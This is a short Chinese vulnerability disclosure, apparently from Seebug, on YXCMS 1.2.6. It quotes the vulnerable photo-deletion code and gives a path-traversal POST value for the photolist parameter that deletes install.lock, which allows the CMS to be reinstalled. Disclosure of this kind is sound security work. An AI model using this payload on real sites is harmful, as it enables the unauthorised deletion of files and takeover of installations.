YXCMS 1.2.6任意文件删除可Reinstall

### 简要描述： YXCMS 1.2.6任意文件删除 # Reinstall ### 详细说明： 前人经验： ``` http://wooyun.org/bugs/wooyun-2010-047226 ``` 产生漏洞文件： ``` protected\apps\admin\controller\photoController.php ``` ``` protected\apps\member\controller\photoController.php ``` 关键代码： ``` if(!empty($photos['photolist'])){ $phoarr=explode(',',$photos['photolist']); foreach ($phoarr as $vo){ if(file_exists($path.$vo)) @unlink($path.$vo); if(file_exists($path.'thumb_'.$vo)) @unlink($path.'thumb_'.$vo); } ``` 追踪： ``` $photos=model('photo')->find("id='$id'",'photolist,sort,extfield,account'); ``` photo表里的数据在新建图集或者编辑图集的时候插入数据库 ``` $_POST[‘photolist’] ``` 来源于用户数据 所以注册完用户，信息中心新建一个图集，然后删除图集，其中photolist参数POST传值修改为： ``` photolist%5B%5D=../../protected/apps/install/install.lock ``` 即可删除install.lock [<img src="https://images.seebug.org/upload/201411/0600130971b2b16db1d3c0e037a9b5c63b38a568.png" alt="64.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0600130971b2b16db1d3c0e037a9b5c63b38a568.png) 之后即可重新安装 [<img src="https://images.seebug.org/upload/201411/06001320faa94d086e2b7ff6d8b736c27d62e95b.png" alt="65.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/06001320faa94d086e2b7ff6d8b736c27d62e95b.png) ### 漏洞证明： 如上